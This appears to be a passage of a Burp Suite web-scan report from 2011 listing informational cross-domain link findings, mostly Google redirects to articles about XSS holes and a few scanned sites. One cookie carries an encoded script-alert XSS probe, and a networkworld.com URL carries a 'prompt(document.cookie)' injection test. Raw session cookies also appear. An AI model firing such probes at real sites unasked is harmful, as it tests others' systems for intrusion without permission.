Request

GET /url?sa=t&source=newssearch&cd=6&ved=0CFAQqQIwBQ&url=http%3A%2F%2Fwww.h-online.com%2Fsecurity%2Fnews%2Fitem%2FphpMyAdmin-updates-close-XSS-hole-1331093.html&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNEMJQ0yjmSOBw6b7aa0Ku_nafuEqw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:13:27 GMT
Server: gws
Content-Length: 286
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html">here</A>
...[SNIP]...

15.48. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=newssearch&cd=2&ved=0CCwQqQIwAQ&url=http%3A%2F%2Fwww.theregister.co.uk%2F2011%2F08%2F22%2Fskype_security_bug%2F&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNEabk0BRCGzN9UIOr7Xdd1ZX1PL8g

The response contains the following link to another domain:

http://www.theregister.co.uk/2011/08/22/skype_security_bug/

Request

GET /url?sa=t&source=newssearch&cd=2&ved=0CCwQqQIwAQ&url=http%3A%2F%2Fwww.theregister.co.uk%2F2011%2F08%2F22%2Fskype_security_bug%2F&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNEabk0BRCGzN9UIOr7Xdd1ZX1PL8g HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://www.theregister.co.uk/2011/08/22/skype_security_bug/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:12:49 GMT
Server: gws
Content-Length: 256
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.theregister.co.uk/2011/08/22/skype_security_bug/">here</A>
...[SNIP]...

15.49. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&sqi=2&ved=0CEQQFjAA&url=http%3A%2F%2Fwww.whatisnetwork.com%2Fnews-events%2F114520%2Fkaspersky-website-vulnerable-to-xss.html&ei=F4NjTu-dIMTUiALl4-WlCg&usg=AFQjCNF9YEkXQOeAhmXon4mPB6zAtVyouw

The response contains the following link to another domain:

http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html

Request

GET /url?sa=t&source=web&cd=1&sqi=2&ved=0CEQQFjAA&url=http%3A%2F%2Fwww.whatisnetwork.com%2Fnews-events%2F114520%2Fkaspersky-website-vulnerable-to-xss.html&ei=F4NjTu-dIMTUiALl4-WlCg&usg=AFQjCNF9YEkXQOeAhmXon4mPB6zAtVyouw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com#sclient=psy&hl=en&tbo=1&tbs=qdr:d&source=hp&q=kapersky+xss&pbx=1&oq=kapersky+xss&aq=f&aqi=g-s5&aql=&gs_sm=e&gs_upl=40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0&tbo=1&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq

Response

HTTP/1.1 302 Found
Location: http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 13:54:42 GMT
Server: gws
Content-Length: 285
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html">here</A>
...[SNIP]...

15.50. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=newssearch&cd=5&ved=0CEsQqQIwBA&url=http%3A%2F%2Fsearchsecurity.techtarget.com%2Ftip%2FAddressing-the-dangers-of-JavaScript-in-the-enterprise&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNFOMpcd-I-vbAhwEd-XtIapPak52Q

The response contains the following link to another domain:

http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise

Request

GET /url?sa=t&source=newssearch&cd=5&ved=0CEsQqQIwBA&url=http%3A%2F%2Fsearchsecurity.techtarget.com%2Ftip%2FAddressing-the-dangers-of-JavaScript-in-the-enterprise&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNFOMpcd-I-vbAhwEd-XtIapPak52Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:13:23 GMT
Server: gws
Content-Length: 292
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise">here</A>
...[SNIP]...

15.51. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=newssearch&cd=8&ved=0CFsQqQIwBw&url=http%3A%2F%2Fblogs.computerworld.com%2F18810%2Fhappy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNFIsFzr3duC4QTGq_y6UJ-ge0n_ew

The response contains the following link to another domain:

http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack

Request

GET /url?sa=t&source=newssearch&cd=8&ved=0CFsQqQIwBw&url=http%3A%2F%2Fblogs.computerworld.com%2F18810%2Fhappy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNFIsFzr3duC4QTGq_y6UJ-ge0n_ew HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:13:36 GMT
Server: gws
Content-Length: 299
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack">here</A>
...[SNIP]...

15.52. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=newssearch&cd=3&ved=0CD8QqQIwAg&url=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNGN-2Av2zwKZrGoHS3XsJ09yYZ2Ag

The response contains the following link to another domain:

http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm

Request

GET /url?sa=t&source=newssearch&cd=3&ved=0CD8QqQIwAg&url=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNGN-2Av2zwKZrGoHS3XsJ09yYZ2Ag HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:12:52 GMT
Server: gws
Content-Length: 307
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm">here</A>
...[SNIP]...

15.53. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=newssearch&cd=1&ved=0CCYQqQIwAA&url=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNHQ5GV8Jm236AqBenvtidgWBdD0Mw

The response contains the following link to another domain:

http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx

Request

GET /url?sa=t&source=newssearch&cd=1&ved=0CCYQqQIwAA&url=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNHQ5GV8Jm236AqBenvtidgWBdD0Mw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:12:47 GMT
Server: gws
Content-Length: 278
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx">here</A>
...[SNIP]...

15.54. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=newssearch&cd=4&ved=0CEQQqQIwAw&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNG9X2-vE6U5F_3cHJtjA6DQEInYZQ

The response contains the following link to another domain:

http://lwn.net/Articles/456878/

Request

GET /url?sa=t&source=newssearch&cd=4&ved=0CEQQqQIwAw&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNG9X2-vE6U5F_3cHJtjA6DQEInYZQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://lwn.net/Articles/456878/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:12:58 GMT
Server: gws
Content-Length: 228
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://lwn.net/Articles/456878/">here</A>
...[SNIP]...

15.55. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=2&sqi=2&ved=0CEkQFjAB&url=http%3A%2F%2Fwww.lexjansen.com%2Fvirus%2F&ei=F4NjTu-dIMTUiALl4-WlCg&usg=AFQjCNHcyS0b0FZdbMKDgrZe_JhoLvGhiw

The response contains the following link to another domain:

http://www.lexjansen.com/virus/

Request

GET /url?sa=t&source=web&cd=2&sqi=2&ved=0CEkQFjAB&url=http%3A%2F%2Fwww.lexjansen.com%2Fvirus%2F&ei=F4NjTu-dIMTUiALl4-WlCg&usg=AFQjCNHcyS0b0FZdbMKDgrZe_JhoLvGhiw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com#sclient=psy&hl=en&tbo=1&tbs=qdr:d&source=hp&q=kapersky+xss&pbx=1&oq=kapersky+xss&aq=f&aqi=g-s5&aql=&gs_sm=e&gs_upl=40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0&tbo=1&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq

Response

HTTP/1.1 302 Found
Location: http://www.lexjansen.com/virus/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 13:54:45 GMT
Server: gws
Content-Length: 228
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.lexjansen.com/virus/">here</A>
...[SNIP]...

15.56. http://www.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.kaspersky.com/?domain=kapersky.com

The response contains the following links to other domains:

http://www.kaspersky-sea.com/
http://www.kaspersky.pl/
http://www.kaspersky.ro/
http://www.kaspersky.ru/
http://www.kaspersky.se/
http://www.kasperskyasia.com/
http://www.kasperskylab.co.kr/
http://www.securelist.com/en/
http://www.securelist.com/en/analysis
http://www.securelist.com/en/blog
http://www.securelist.com/en/descriptions

Request

GET /?domain=kapersky.com HTTP/1.1
Host: www.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 23823
Content-Type: text/html; charset=utf-8
Location: http://usa.kaspersky.com/?domain=kapersky.com
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 12:17:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<li><a href="http://www.kaspersky.se/" onclick="try{trackCountrySelector(this);}catch(err){}">Sverige</a>
...[SNIP]...
<li><a href="http://www.kaspersky.pl/" onclick="try{trackCountrySelector(this);}catch(err){}">Polska</a>
...[SNIP]...
<li><a href="http://www.kaspersky.ro/" onclick="try{trackCountrySelector(this);}catch(err){}">Rom..nia</a>
...[SNIP]...
<li><a href="http://www.kaspersky.ru/" onclick="try{trackCountrySelector(this);}catch(err){}">............</a>
...[SNIP]...
<li><a href="http://www.kaspersky-sea.com/" onclick="try{trackCountrySelector(this);}catch(err){}">South-East Asia</a>
...[SNIP]...
<li><a href="http://www.kasperskyasia.com/" onclick="try{trackCountrySelector(this);}catch(err){}">Asia Pacific</a>
...[SNIP]...
<li><a class="image" href="http://www.kasperskylab.co.kr/" onclick="try{trackCountrySelector(this);}catch(err){}"><img src="/images/korea.gif" title="Korea" alt="Korea" />
...[SNIP]...
<h2><a href="http://www.securelist.com/en/">Securelist</a>
...[SNIP]...
<li><a href="http://www.securelist.com/en/blog">Virus Analyst Blog</a>
...[SNIP]...
<li><a href="http://www.securelist.com/en/analysis">Securelist Analysis</a>
...[SNIP]...
<li><a href="http://www.securelist.com/en/descriptions">Virus Descriptions</a>
...[SNIP]...

15.57. http://www.maas360.com/themes/maasweb2011/css/form.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maas360.com
Path:	/themes/maasweb2011/css/form.css

Issue detail

The page was loaded from a URL containing a query string:

http://www.maas360.com/themes/maasweb2011/css/form.css?m=1300123562

The response contains the following links to other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://twitter.com/maas360
http://www.facebook.com/MaaS360
http://www.google-analytics.com/ga.js
http://www.linkedin.com/company/163792
http://www.youtube.com/user/MaaStersCenter
https://portal.fiberlink.com/

Request

GET /themes/maasweb2011/css/form.css?m=1300123562 HTTP/1.1
Host: www.maas360.com
Proxy-Connection: keep-alive
Referer: http://www.maas360.com/406.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fltrk_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3Df5dba--%3E%3Cscript%3Ealert%28%22DORK%22%29%3C%2Fscript%3Ecebbc660511; fltrk_ref_orig=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3Df5dba--%3E%3Cscript%3Ealert%28%22DORK%22%29%3C%2Fscript%3Ecebbc660511; fltrk_refdom=google; fltrk_refdom_orig=google; _mkto_trk=id:083-YJE-211&token:_mch-maas360.com-1315146809613-13633; __utma=152486630.388950131.1315146814.1315146814.1315146814.1; __utmb=152486630.2.10.1315146814; __utmc=152486630; __utmz=152486630.1315146814.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; PHPSESSID=27d4493fc1281f34f0c3751668188233

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:34:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:41 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:41 GMT; path=/; httponly
Content-Type: text/html; charset="utf-8"
Content-Length: 39447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="Chrome Chrome_535">

               <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

15.58. http://www.networkworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/idge.nww.home/;pos=bottomimu;sz=336x280,300x250,336x600;tile=10;author=network_world_staff;cid=75931;kw=;ord=0061498137?
